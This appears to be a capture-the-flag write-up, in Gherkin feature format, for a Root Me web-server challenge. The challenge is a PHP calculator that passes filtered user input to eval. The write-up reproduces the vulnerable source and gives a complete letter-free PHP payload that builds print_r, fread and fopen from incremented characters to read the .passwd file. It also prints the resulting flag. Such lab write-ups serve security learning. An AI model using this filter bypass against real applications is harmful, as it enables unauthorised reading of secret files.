## Version 2.0
## language: en

Feature:  Web Server - Root Me
  Site:
    www.root-me.org
  Category:
    Web Server
  User:
    jdanilo7
  Goal:
    Read the .passwd file exploiting a php filtered eval function call

  Background:
  Hacker's software
    |     <Software name>      |    <Version>    |
    |     Firefox Quantum      |      65.0.2     |
  Machine information:
    Given The challenge url
    """
    http://challenge01.root-me.org/web-serveur/ch57/
    """
    And The challenge statement
    """
    Find a vulnerability in this service and exploit it.
    Note : the flag is in .passwd file.
    """
    And the challenge source code
    """
    1  <html>
    2    <head>
    3    </head>
    4    <body>
    5
    6      <h4> PHP Calc </h4>
    7
    8      <form action='index.php' method='post'>
    9        <input type='text' id='input' name='input' />
    10        <input type='submit' />
    11        <?php
    12
    13          if (isset($_POST['input'])) {
    14            if(!preg_match('/[a-zA-Z`]/', $_POST['input'])){
    15              print '<fieldset><legend>Result</legend>';
    16              eval('print '.$_POST['input'].";");
    17              print '</fieldset>';
    18            }
    19            else
    20              echo "<p>Dangerous code detected</p>";
    21          }
    22        ?>
    23      </form>
    24    </body>
    25  </html>
    """
    Then I am asked to read the passwd file exploiting the eval function

  Scenario: Success: Use variable functions and arithmetic operations on chars
    Given the challenge source code
    Then I notice I can only use numbers and special chars other than "`"
    Given I can use variable functions to call functions like this
    """
    1  $var = "print_r";
    2  $var("Hello world"); //It will print Hello world using the print_r func
    """
    And I can change character values using arithmetic operations like this
    """
    1  $var = "A";
    2  $var++; //Turns A into B
    """
    And I can create variable names using the "_" character
    And I can form the "Array" string by doing this
    """
    1  $var = ''.[]; //The value of $var is now "Array"
    """
    Then I can write a payload that can read and print the contents of .passwd
    """
    1  '-';$_=[];
    2  $_=''.$_; // $_ = "Array"
    3  $_=$_[3]; // Take the char "a"
    4  // Form the "print_r" string
    5  $__=$_;
    6  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
             $__++;$__++;$__++;$__++; // p
    7  $_____=$__;
    8  $__=$_;
    9  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
             $__++;$__++;$__++;$__++;$__++;$__++; // r
    10  $_____.=$__;
    11  $__=$_;
    12  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // i
    13  $_____.=$__;
    14  $__=$_;
    15  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
              $__++;$__++; // n
    16  $_____.=$__;
    17  $__=$_;
    18  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
              $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // t
    19  $_____.=$__;
    20  // Form the "fread" string
    21  $__=$_;
    22  $__++;$__++;$__++;$__++;$__++; // f
    23  $______.=$__;
    24  $__=$_;
    25  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
              $__++;$__++;$__++;$__++;$__++;$__++; // r
    26  $______.=$__;
    27  $__=$_;
    28  $__++;$__++;$__++;$__++; // e
    29  $______.=$__;
    30  $__=$_; //a
    31  $______.=$__;
    32  $__++;$__++;$__++; // d
    33  $______.=$__;
    34  // Form the "fopen" string
    35  $__=$_;
    36  $__++;$__++;$__++;$__++;$__++; // f
    37  $_______.=$__;
    38  $__=$_;
    39  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
              $__++;$__++;$__++; // o
    40  $_______.=$__;
    41  $__=$_;
    42  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
              $__++;$__++;$__++;$__++; // p
    43  $_______.=$__;
    44  $__=$_;
    45  $__++;$__++;$__++;$__++; // e
    46  $_______.=$__;
    47  $__=$_;
    48  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
              $__++;$__++; // n
    49  $_______.=$__;
    50  // Form the "passwd" string
    51  $__=$_;
    52  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
              $__++;$__++;$__++;$__++; // p
    53  $________.=$__;
    54  $__=$_; //a
    55  $________.=$__;
    56  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
              $__++;$__++;$__++;$__++;$__++;$__++;$__++; // s
    57  $________.=$__;
    58  $________.=$__;
    59  $__=$_;
    60  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
              $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
              $__++; // w
    61  $________.=$__;
    62  $__=$_;
    63  $__++;$__++;$__++; // d
    64  $________.=$__;
    65  // 'r' for the fopen call
    66  $__=$_;
    67  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
              $__++;$__++;$__++;$__++;$__++;$__++;
    68  // Final call print(fread(fopen(".passwd", 'r'), 50));
    69  $_____($______($_______('.'.$________, $__), 50));
    """
    Given I enter my payload in the input string
    Then I get the following reponse
    """
    M!xIng_PHP_w1th_3v4l_L0L
    """
    And I validate the flag on the challenge website
    And it is accepted
